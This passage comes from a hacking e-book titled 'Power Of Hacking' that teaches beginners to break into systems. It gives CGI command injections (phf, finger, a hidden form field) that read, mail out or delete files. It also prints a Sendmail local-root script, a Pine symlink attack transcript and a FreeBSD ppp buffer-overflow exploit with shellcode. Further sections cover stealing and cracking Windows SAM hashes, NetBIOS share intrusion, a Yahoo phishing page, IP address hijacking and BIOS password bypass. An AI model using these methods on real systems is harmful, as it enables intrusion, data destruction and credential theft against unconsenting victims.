switch off the web use annoyance Whenever Windows stumbles across a file type it doesn‘t recognise you are will see a message box that says Windows cannot open this file‘ and gives you the option to ‗Use the Web Service‘, to find the necessary program. I don‘t know about you but I can‘t recall a single instance where it has worked and it‘s usually much quicker just to Google the file name or extension. Well, thanks to the clever folk at ‗howtogeek‘ here‘s a way to zap that dialogue box and go straight to the Programs list, that you would get if you chose the second option. It works in both XP and Vista and involves editing the Registry, so pay attention, and bear in mind the usual warnings and disclaimers about backing up the Registry first, and not messing with it if you don‘t know what you are doing. Begin by opening the Registry Editor (‗regedit‘ in Run on the Start menu) and pop along to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
Mail:mtahirzahid@yahoo.com
Page 121
Power Of Hacking If there is a key called Explorer skip the next step, if not create one by right-click Policies then New > Key and rename it ‗Explorer‘ (without the quotes). The Explorer key should now be open in the right hand pane, right click into it and select New > DWORD Value, rename that to: ‗NoInternetOpenWith‘, right-click it, select Modify and change the Value to 1. (Changing the Value to 0, or deleting the key will reset the hack). That‘s it, close Regedit, there‘s no need for a reboot, so all that remains is to try it out by creating a file with an unrecognised extension and see what happens whenyou try to open it.
Browser Hack I - Introduction This file will describe several techiniques to aquire a password file just by using an ordinary web browser, the information provided will be best described for the beginner hacker, but all hackers should benifit from this information II - Hacking from your Web Browser There are several techniques on what i call "Web Browser Hacking", many beginners dont know that you cant query a etc/passwd file from your browser and i will describe all the ways to aquire a passwd file, first you need to find a box that is running the cgi-bin/phf file on their system, a great way to find out without trial and error is to go to www.altavista.com and just search on cgi-bin and perl.exe or cgi-bin and phf a - Finger box hacking: Lets say you wanted to break into somewhere like AOL, the first thing we would do is type in their web site in the URL: http://www.aol.com, the next thing we would do is add /cgi-bin/finger to the web URL so it would look like this http://www.aol.com/cgibin/finger, if the finger gateway is operational a box should appear for you to enter the name you want to finger, if it is operational you have a chance to receive the etc/passwd file, next thing you will probably want to do is search for a mailto on the web page, just scan the page for any mailto refs, go back to the finger box and type in this query, nobody@nowhere.org ; /bin/mail me@junk.org < etc/passwd, this string takes nobody and emails the passwd file to your email address, if this works you now have the etc/passwd file in your mailbox, you can now run a crack program against it and have a little fun on their box b - The common cgi-bin/phf query: This section is for the very beginning hacker, lets take the same scenerio from the first example except in the URL we would type, http://www.aol.com/cgi-bin/phf, if the phf is operational and has not been removed you should get a series of search boxes on the next page (ignore these boxs) to your URL you would add this string ?Qalias=x%0a/bin/cat%20/etc/passwd... so the entire string would look like this http://www.aol.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd, this string will print out the etc/passwd file strait to your web browser all you need to do is save it as Mail:mtahirzahid@yahoo.com
Page 122
Power Of Hacking a file and again run a crack program against it, (This is considering that they are not :*: or :x:) c - Dont take my cgi form: This section will explain how to use somebody else's cgi form to obtain the etc/passwd file, lets say you look at a document source from a web page and find this in the source: <html><body> <h2>This is a form to go to Modify</h2> <form action = "http://www.aol.com/cgi-bin/doc.pl" method="get"> <input type="hidden" name="myaddress" value="nobody@aol.com"> <input type="text" name="input"> <input type="submit" value="send"> </form> </body></html> This is a simple form that asks a user to input a message to be sent to a script called doc.pl, included in the doc.pl script is the following line which is assuming the line has already been parsed out system("/usr/lib/sendmail -t $myaddress < $tempfile") Now lets set up your page: <html><body> <h2>Hack AOL</h2> <form action = "http://www.aol.com/cgi-bin/doc.pl" method = "get"> <input type="hidden" name="myaddress" value=" ; rm * ;mail -s file youraddress@yourisp.com </etc/passwd;"> <input type = "text" name="input"> <input type = "submit" value=:"getpasswd"> </form> The semicolons in the hidden value field act as delimiters, they separate the UNIX commands, this executes commands on the same line, the system call in PERL and creates a UNIX shell, and in here mails the passwd file to you. d - Changing web pages from your browser: This short section will describe the string to use to edit a web page from your web browser, same scenario as the first section, http://www.aol.com, we will then add the following string cgi-bin/phf?Qalias=x%0a/bin/echo%20 "some text and shit"%20>>filename.html, this string will allow you to write to the filename.html and add "some text and shit" be noted it has to be in html format, you can place text, pictures or whatever you like
Changing IP Address
Mail:mtahirzahid@yahoo.com
Page 123
Power Of Hacking 1) Getting Your IP Range: Getting information about your ip range is not difficult, i recomend using Neo-Trace on your own ip, but for our test just look at your ip address, say it's 24.193.110.13 you can definetly use the ip's found between 24.193.110.1 < [new ip] < 24.193.110.255, don't use x.x.x.1 or x.x.x.255. To find your ip simply open a dos/command prompt window and type ipconfig at the prompt, look for "ip address" 2) Subnet Mask, Default Gateway, DHCP Server: These are very easy to find, just open a dos/command prompt window and type "ipconfig /all" without the ", you should see something like this: Windows IP Configuration Host Name . . . . . . . . . . . . : Your Computer Name Here Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Unknown IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : xxxx.xx.x Description . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI) Physical Address. . . . . . . . . : XX-XX-XX-XX-XX-XX Dhcp Enabled. . . . . . . . . . . : Yes Autoconfiguration Enabled . . . . : Yes IP Address. . . . . . . . . . . . : 24.xxx.xxx.xx Subnet Mask . . . . . . . . . . . : 255.255.240.0 Default Gateway . . . . . . . . . : 24.xxx.xxx.x DHCP Server . . . . . . . . . . . : 24.xx.xxx.xx DNS Servers . . . . . . . . . . . : 24.xx.xxx.xxx 24.xx.xxx.xx 24.xx.xxx.xxx Lease Obtained. . . . . . . . . . : Monday, January 20, 2003 4:44:08 PM Lease Expires . . . . . . . . . . : Tuesday, January 21, 2003 3:43:16 AM This is all the information you will need for now, i sugest you either keep your dos/command prompt window open or copy & paste the information somewhere, to copy right click the window and select text and click once 3) Changing Your IP Address: To change your ip address first pick any ip you like out of your ip range and Mail:mtahirzahid@yahoo.com
Page 124
Power Of Hacking remember it or write it down, it is usualy a good idea to make sure the ip is dead [except for what we are going to do later on] so just ping it via "ping x.x.x.x" and if it times out then you can use it, now go to my computer, then control panel, in control panel select network connections and pick your active connection, probably local area connection or your ISP name, open that connection by double clicking on the icon in network connections, then select properties under the general tab, in the new window that pops up select internet protocol [TCP/IP] and click properties, it's under the general tab, in this new window select the general tab and choose "use the following ip address" and for the ip address enter the ip you would like to use [the one you picked from your subnet earlier] and for the subnet mask enter the subnet mask you got when your ran ipconfig /all, same goes for the default gateway, now select "use the following dns server addresses" and enter the information you got earlier, now just click ok, test that it worked, try to refresh a website and if it works you know everything is okay and you are connected, to make sure the change worked type ipconfig again and the ip address should have changed to your new one 4) DDoS And DoS Protection: If your firewall shows that you are being ddosed, this is usualy when you are constantly getting atempted UDP connections several times a second from either the same ip address or multiple ip addresses [ddos], you can protect your-self by changing your ip address via the method i described above 5) Webservers And Other Services: If you know someone on your ip range is running a webserver and he or she has pissed you off or you just like messing around you can steal their ip address so any dns going to that ip will show your site instead because you would be running a webserver your-self, to steal an ip is to basicaly use the changing ip address method above and picking an ip that someone that is running a webserver has in use, often you will be able to keep that ip at least for some time, other times you won't be able to use it so just keep trying untill it works, you your-self will need to have a web server on the same port with your message, you can do this with other services too, you can also DoS or DDoS the ip address you are trying to steal to kick him off the net Here is the best way to crack the bios password in win 95/98:
Follow the steps below:
1) Boot up windows. 2) go to dos-prompt or go to command prompt directly from the windows start up menu. Mail:mtahirzahid@yahoo.com
Page 125
Power Of Hacking
3) type the command at the prompt: "debug" (without quotes ninja.gif ) 4) type the following lines now exactly as given....... o 70 10 o 71 20 quit exit
4) exit from the dos prompt and restart the machine
password protection gone!!!!!!!!!!!!! biggrin.gif
EnjoYYYYYYYYYY
PS: I tested this in Award Bios........ There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine...........
I have not found any other trouble if the codes are used.
To be on safe side, just back up your data..........
The use of this code is entirely at ur risk.......... It worked fine for me.......... Hacking Webpage - The Ultimate guide Mail:mtahirzahid@yahoo.com
Page 126
Power Of Hacking
Well Psychotic wrote one of the most helpful unix text files in cyberspace but with the mail that we recieved after the release of our famous 36 page Unix Bible we realised that unix isn't for everybody so we decided that we should write on another aspect of hacking..... Virtual Circuit and Psychotic is proud to release, "Hacking Webpages With a few Other Techniques." We will discuss a few various ways of hacking webpages and getting root. We are also going to interview and question other REAL hackers on the subjects.
Getting the Password File Through FTP
Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need learn a little about the password file...
root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file.
root:x:0:1:Superuser:/: Mail:mtahirzahid@yahoo.com
Page 127
Power Of Hacking ftp:x:202:102:Anonymous ftp:/u1/ftp: ftpadmin:x:203:102:ftp Administrator:/u1/ftp
This is another example of a password file, only this one has one little difference, it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker(both explained later in the text). Below is another example of a shadowed password file:
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Mail:mtahirzahid@yahoo.com
Page 128
Power Of Hacking Shadowed password files have an "x" in the place of a password or sometimes they are disguised as an * as well.
Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it.
Cracking a password file isn't as complicated as it would seem, although the files vary from system to system. 1.The first step that you would take is to download or copy the file. 2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recomend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be added) . We will be releasing our pasword file to the public soon, it will be called, Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives you.
The PHF Technique Mail:mtahirzahid@yahoo.com
Page 129
Power Of Hacking
Well I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it.
The phf technique is by far the easiest way of getting a password file(although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link:
http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for www.webpage.com you would type:
http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
and that's it! You just sit back and copy the file(if it works).
Telnet and Exploits
Well exploits are the best way of hacking webpages but they are also more complicated then hacking through ftp or using the phf. Before you can setup an exploit you must first have a telnet proggie, there are many different clients you can just do a netsearch and find everything you need.
Mail:mtahirzahid@yahoo.com
Page 130
Power Of Hacking Itâ&#x20AC;&#x2DC;s best to get an account with your target(if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each seperately. Iâ&#x20AC;&#x2DC;m going to list a few below but the list of exploits is endless.
This exploit is known as Sendmail v.8.8.4 It creates a suid program /tmp/x that calls shell as root. This is how you set it up:
cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # Mail:mtahirzahid@yahoo.com
Page 131
Power Of Hacking cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi
and now on to another exploit. Iâ&#x20AC;&#x2DC;m going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the Mail:mtahirzahid@yahoo.com
Page 132
Power Of Hacking lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile.
Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.
This was writen by Sean B. Hamorâ&#x20AC;ŚFor this example, hamors is the victim while catluvr is the attacker: hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine Mail:mtahirzahid@yahoo.com
Page 133
Power Of Hacking
catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 ++
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
now on to another one, this will be the last one that Iâ&#x20AC;&#x2DC;m going to show. Exploitation script for the ppp vulnerbility as described by no one to date, this is NOT FreeBSD-SA-96:15. Works on FreeBSD as tested. Mess with the numbers if it doesnt work. This is how you set it up: v #include #include #include
#define BUFFER_SIZE 156 /* size of the bufer to overflow */
Mail:mtahirzahid@yahoo.com
Page 134
Power Of Hacking #define OFFSET -290 /* number of bytes to jump after the start of the buffer */
long get_esp(void) { __asm__("movl %esp,%eax\n"); }
main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */ int i,j;
buf = malloc(4096);
/* fill start of bufer with nops */
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i); Mail:mtahirzahid@yahoo.com
Page 135
Power Of Hacking ptr = buf + i;
/* place exploit code into the buffer */
for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i];
addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr; *ptr = 0;
setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL); }
Now that youâ&#x20AC;&#x2DC;ve gotten root "whatâ&#x20AC;&#x2DC;s next?" Well the choice is up to you but I would recommend changing the password before you delete or change anything. To change their password all you have to do is login via telnet and login with your new account. Then you just type: passwd and it will ask you for the old password first followed by the new one. Now only you will have the new pw and that should last for a while Mail:mtahirzahid@yahoo.com
Page 136
Power Of Hacking you can now upload you pages, delete all the logs and just plain do your worst things.
Hacking Webpages Getting The Password File Through FTP: Ok well one of the easiest ways of getting super-user access is through anonymous ftp access into a webpage, first you need learn a little about the password file Root:User:d7Bdg:1n2HG2:1127:20:superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh This is an example of a regular encrypted password file, the superuser is the part that gives you root, that's the main part of the file, root:x:0:1:Superuser:/: ftp:x:202:102:Anonymous ftp:/u1/ftp: ftpadmin:x:203:102:ftp Administrator:/u1/ftp This is another example of a password file, only this one has one little difference, it's shadowed, shadowed password files don't let you view or copy the actual encrypted password, this causes problems for the password cracker and dictionary maker below is another example of a shadowed password file, root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false Shadowed password files have an "x" in the place of a password or sometimes they Mail:mtahirzahid@yahoo.com
Page 137
Power Of Hacking are disguised as an * as well, now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed, pw file, we can now go on to talk about how to crack it Cracking a password file isn't as complicated as it would seem, although the files vary from system to system, 1) Take password file, download or copy it 2) Find a password cracker and a dictionary maker, although it's nearly impossible to find a good cracker there are a few ok ones out there, i recomend that you look for cracker jack, john the ripper, brute force cracker, or jack the ripper, now for a dictionary maker or a dictionary file, when you start a cracking prog you will be asked to find the the password file, that's where a dictionary maker comes in, you can download one from nearly every hacker page on the net, a dictionary maker finds all the possible letter combinations with the alphabet that you choose (ASCII, caps, lowercase, and numeric letters may also be added) 3) You then start up the cracker and follow the directions that it gives you The PHF Technique: The phf technique is by far the easiest way of getting a password file (although it doesn't work 95% of the time), but to do the phf all you do is open a browser and type in the following link: http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd, you replace the webpage_goes_here with the domain, so if you were trying to get the pw file for www.webpage.com you would type: http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HOW TO GET ANY WINDOWS PASSWORD
ok..... here are the full details.....
this works whether its windows 2000 or windows xp or windows xp SP1 or SP2 or windows server 2003....
this works even if syskey encryption is employed...
if it is FAT filesystem...
Mail:mtahirzahid@yahoo.com
Page 138
Power Of Hacking just copy the sam file like stated in the first post to an empty floppy disk and take it home. I'll tell u what to do with it later... DON'T DELETE THE ORIGINAL SAM FILE. just remove its attributes. the sam file is a file called SAM with no extension. YOU MUST ALSO GET.... a file called SYSTEM which is in the same folder as SAM. both files have no extensions...
if it is NTFS....
u have to download a program called NTFSPro.... it allows u to read from ntfs drives... the demo version allows read only. the full version is read-write.... you use the program to create an unbootable disk (so u will still need another bootable disk and an empty disk) that has the required files to access NTFS.
use the boot disk to get into dos, then use the disks created with ntfspro to be able to access the filesystem, then copy the SAM and SYSTEM files to another empty disk to take home....
AT HOME: u have to get a program called SAMInside. it doesn't matter if it is demo version. SAMInside will open the SAM file and extract all the user account information and their passwords, including administrator. SAMInside will ask for the SYSTEM file too if the computer you took the SAM file from has syskey enabled. syskey encrypts the SAM file. SAMInside uses SYSTEM file to decrypt the SAM file. After SAMInside finishes, u still see user accounts and hashes beside them. the hashes are the encoded passwords. Use SAMInside to export the accounts and their hashes as a pwdump file into another program, called LophtCrack. it is currently in version 5, it is named LC5. the previous version, LC4 is just as good. u need the full or cracked version of the program. LC5 uses a brute force method by trying all possible combinations of letters numbers, and unprintable characters to find the correct password from the hashes in the pwdump file imported into it from SAMInside. This process of trying all passwords might take 5 minutes if the password is easy, up to a year if the password is long and hard (really really hard). LC5 howver, unlike LC4, is almost 100 times faster. both can be configured to try dictionary and common words before using all possible combinations of everything. Once the correct password is found, it will display the passwords in clear beside each account, including administrator.
I use this method so many times. I've compromised the whole school computer infrastructure. LC4 usually took between 1 second and 10 minutes to find the passwords because they were common words found in any english dictionary. I haven't used LC5 yet.
If there is anything unclear, anything I overlooked, plz tell me so that I can turn this into a very easy to follow tutorial to help anybody crack any windowz pass. Mail:mtahirzahid@yahoo.com
Page 139
Power Of Hacking
Programs needed: SAMInside (doesn't matter which version or if demo) LC4 or LC5 (lophtcrack)( must be full version) NTFSPro (doesn't matter if demo) any bootdisk maker
Cracked or full version software can be found on any warez site. If u don"t know what that is or where to get the programs, post a message and I'll tell u or give them to u.
P.S: I might not keep track of this forum, because I'm going to create a new topic and post tutorial there. if u want to post, plz post there.
Netbios Hacking A - How The Hack Works Netbios is a tcp/ip protocol [this means that it runs over the internet] it is used to share files and printers, the port that netbios runs under is 139, it is easy to hack because windows has installed programes to exploit this vulnrability, although there arn't as many people open to this attack as in the past, there are still a few B - Getting Started First of all you need netbios enabled in on your box to do this in xp goto your dial-up connection properties and and click on tcp/ip properties click the advanced tab then wins and enable it down the bottom, restart mind this is for xp only, it should be enabled automaticly on any other version, next find a target the best way to do this is to get mirc this is a good irc client for winblowz get this up and running and use the /dns <username> to get an ip address, then open up command prompt or ms-dos and type nbtstat -A ip address hit enter and wait you should get 1 of 2 screens : 1 - host not found, [or something like that] 2 - C:\>nbtstat -A 192.168.0.99 Local Area Connection : Node ip_address: [192.168.0.99] Scope Id: [] Mail:mtahirzahid@yahoo.com
Page 140
Power Of Hacking NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------SERVER <00> UNIQUE Registered SLASHER <00> GROUP Registered SERVER <03> UNIQUE Registered SERVER <20> UNIQUE Registered SLASHER <1E> GROUP Registered SLASHER <1D> UNIQUE Registered MSBROWSE <01> GROUP Registered SERVER <01> UNIQUE Registered MAC Address = 00-02-E3-05-AE-ED Well this tells all see the <20> hex this is what we are looking for this lets us know that this box is open and hackable, there are a few exection's to this rule but 90% of the time this is the case, if you cant find a host the first time just keep trying there are lots of open comps out there, now that we have found a open host lets start hacking, to view the hosts shares [thats what we are hacking] type Net view \\ip address, you should get a list something like this C:\>net view \\192.168.0.99 Shared resources at \\192.168.0.99 850 Share name Type Used as Comment -------------------------------------C:\ Disk cd-rom Disk GAMES (D) Disk Printer Print HP DeskJet 692C SharedDocs Disk So now that you have found out the name of the shares time to start looking inside them, there are two ways to do this : 1 - Type the ip into your browser [internet explorer] like so \\ip address 2 - Type net use x: \\ipaddress\sharename [example: net use c: \\123.123.123.123\c] The second command is good because you can view the shares in dos thus speeding up the load time, what is does is maps the c drive of the remote host to a local drive in this case x: to you computer, so just type x: in to your shell [command prompt, ms-dos] and browse just like it was your c drive
Mail:mtahirzahid@yahoo.com
Page 141
Power Of Hacking Steal Yahoo ID Many of us want to mess with our friends and get their passwords of yahoo accounts, the easiest method to do this is send them a greeting card to a fake login page, i have created a fake login page at http://www.greetingscards.cjb.net All you have to do is : 1) Get the source html code of it in a notepad, if you don't know how to do that then, open www.greetingscards.cjb.net, then click on edit with notepad, the html codes opened in the opened in notepad are the html codes you will be putting on your website 2) After you have got the source codes, find the email id e-mail_here@yahoo.com in it 3) Replace the e-mail_here in [my id] with your victim's id, this will be the id you want your friends/enimies passwords sent to 4) Make your webpage by copy pasting these html codes on your website [ preferably on geocities, because it's free, use the page builder option, in that use the insert forms and script, html option and paste the html codes, then launch your site ] 5) E-mail your friend this format : viewing your e-card is a snap, Just choose from the following options: Click on the following link: http://www.your-site.com, or Copy and paste the above link into your web browser's address window and Enter this e-card number, 622686767495, on our e-card pick up page at : http://www.your-site.com We hope you enjoy your e-card, if you have any comments or questions, please visit http://www.your-site.com Thanks for using Yahoo! Greetings with http://www.your-site.com
Using Telnet 1 - Why This Tutor Most of you only know that telnet is a Port [Port 23] or that telnet is a remote control Mail:mtahirzahid@yahoo.com
Page 142
Power Of Hacking tool, remote control means in this aspect that you as client can get a connection to for example a telnet server and then you can write commands in a derivate of a shell and these commands are executed only on this server not on your machine, but i want to show all you guys how to use this simple remote control tool in several ways, because this simpleness is brilliant, so hope i answered this question and if you are interested in go on and read if not stop reading and go pissing 2 - How To Use Telnet Telnet is a text based tool, so if you want to connect to the destination [128.62.254.12] write: 'telnet 128.62.254.12 23', so you see at first there is the command telnet to start the telnet client, the next is the destination address and last is the port, you know the telnet port 23, so i hope now you can use telnet 3 - How To Send Anonymous Mails 3-1 - SMTP Yes first i have to say somehting about the smtp [simple mail transfer protocol], the standard is written down in the rfc 821 [rfc = request for comments] it goes back to the year 1982, this rfc defines the commands which could be used These commands : 1 - HELO [client adress or name], it marks the begin of that telnet session and sends your name or address to the smtp server 2 - MAIL FROM [your mail addie], with this command you send your mail addie to server is also written in the e-mail as sender 3 - RCPT TO [recipient], with this command you define the recipient 4 - DATA, this marks the begnning of the e-mail if the server sends an ack [ackwoledge] you can begin to write the message 5 - RSET, reset this establishs the initial stage and the connection is canceled 6 - NOOP, no operation so it means that nothing is done 7 - QUIT, this is the ending of the smtp connection But this are only the most important commands many commands have been added in this time after the rfc has defined them EXPN, expand with this command maillist support will be available VRFY, verify this command requests the confirmation of the recipient address Caused of this addition them smtp is also called esmtp which means Extended smtp 3-2 How To Use SMTP To Send Anonymous Mails Mail:mtahirzahid@yahoo.com
Page 143
Power Of Hacking First you have to find a free accessable smtp server, caused by spaming many servers has secured their systems like gmx with [smtp after pop] which means that at first you have to login at pop with your username and password for your gmx email addie, after that the srever saves your ip for a special time in which you can connect to smtp server to send mails, freenet uses another secured system, this smtp server denies special recepient addies, so you have to search a free accessable mail server with out such secured servers, they exists, so after you have found such a server you can write in your shell : [telnet <serveraddy> 25] then your client connects to it, here is a complete telnet session : Connected to mail.gmx.net. 220 {mp015-rz3} GMX Mailservices ESMTP HELO www.The-Netrix.net 250 {mp015-rz3} GMX Mailservices MAIL FROM:LinusTorvalds@linux.org 250 ... Sender Okay RCPT TO:BillGates@microsoft.com 250 ... Recipient Okay DATA 354 Enter mail, end with "." on a line by itself Operating Systems are like sex, you have the best if it is free . 250 Mail accepted QUIT 221 mail.gmx.net closing connection Connection closed by foreign host. First your client trys to connect to the mail server, as sign that the connection is established the server answers with a command like that, then you say hello to the server with the command [HELO] and your machines name, next is another answer from server which is unimportant, after it you send your mail addy to server with the command [MAIL FROM:] followed by your addy, then the server check this addy and if it's ok he will inform you about it, next he expects the recipient and you won't let him wait with the command [RCPT TO:] followed by the addy of the recipient, if it's also ok you can start to write your mail after the command [DATA] which is followed by the ack of the server and the text or character which marks the end of the mail, then you write your mail and end it how the server expect it, if the mail is ok the server will inform you for the last time in this session, after it there is no cause which should hold your connection so you will end it with [QUIT] and the server will send a last stupid message as sign that the connection is closed 4 - How To Use Telnet In Several Aspects 4-1 - How To Delete Files Of A Website There is a way to delete files of a website with the help of the http [hyper text transfer protocol] but this security hole is mostely Mail:mtahirzahid@yahoo.com
Page 144
Power Of Hacking closed, this hole is caused by stupid administrators which can't configure there apache or iis or any other http server 4-1-1 - HTTP The http exists since 1990, before this time the internet was used to make a file exchange with the ftp or to get in mailboxes where you can write messages or many other things, with the http and html [hyper text mark language] the www_clients like netscape or ie can interprete this hyper text to display informations or other things like you know, but what the user can't see when he uses such a client that the http follows also the request_answer_play, the client requests informations with a special command, which i will explain beside others later, and the http server answers with the requested informations, this requests or answers are http messages which could be simple_request or simple_response or full_request or full_response, the simple http_messages based on http/0.9 and the full messages on http/1.0, but the difference between this messages is very small, except the one of html/0.9 and html/1.0 1 - get [address], the address is the whole like http://www.destination.com/index.html this command requests the informations [the code] in this file and if the file is a cgi it have to be executed and the produced informations will be send to client the difference between this simple_request and the full_request is that the full_request ends with http/1.0 like this : [get http://www.destination.com/index.html http/1.0] 2 - head [addy], it have to be a complete addy too, the small difference between this command and the get command is that this command only meta_tags and the other informations in the title tag 3 - post [addy], this is used for bigger data it is mostley used for data which have to be send to a program 4 - put [addy], with put you send data to the server like html documents and this data is saved under the addy 5 - delete [addy], this is the opposite of put so it deletes the data which you have specified with the addy 4-1 - How To Delete Files Of A Website With your instinct you have discovered that there is a security hole, the http protocol today is used in combinition with the ftp, so that means ftp is used by webmasters to upload their files and http is used by the client to resolve these site, but in former times concrete, at the development of the http the developers aimed to make it easier to upload files, so not with the ftp and that means without a special ftp-client, so they 